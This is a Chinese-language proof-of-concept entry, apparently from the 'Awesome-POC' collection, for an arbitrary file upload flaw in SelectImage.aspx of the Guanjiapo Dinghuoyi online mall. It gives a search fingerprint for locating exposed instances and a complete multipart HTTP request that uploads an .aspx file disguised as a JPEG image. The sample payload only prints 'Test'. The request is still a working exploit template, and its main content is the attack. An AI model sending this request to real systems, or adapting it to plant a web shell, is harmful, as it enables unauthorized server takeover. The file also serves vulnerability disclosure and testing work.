Awesome-POC/Web应用漏洞/任我行 管家婆 订货易在线商城 SelectImage.aspx 任意文件上传漏洞.md
2024-11-06 14:10:36 +08:00

42 lines
1.2 KiB
Markdown

# 任我行 管家婆 订货易在线商城 SelectImage.aspx 任意文件上传漏洞
## 漏洞描述
任我行率先针对中小企业推出了管家婆进销存、财务一体化软件。
管家婆订货易在线商城存在 SelectImage.aspx 任意文件上传漏洞,攻击者可通过该漏洞可控制整个系统,最终导致系统处于极度不安全状态。
## 漏洞影响
管家婆 订货易在线商城
## 网络测绘
```
title="订货易"
```
## 漏洞复现
登陆页面
![image-20231115102159123](images/image-20231115102159123.png)
poc
```
POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=532c7611457d40f4ae4cd9422973416b
--532c7611457d40f4ae4cd9422973416b
Content-Disposition: form-data; name="Filedata"; filename="TEST.aspx"
Content-Type: image/jpeg
<% Response.Write("Test"); %>
--532c7611457d40f4ae4cd9422973416b--"
```
![image-20231115102227428](images/image-20231115102227428-17000150119182.png)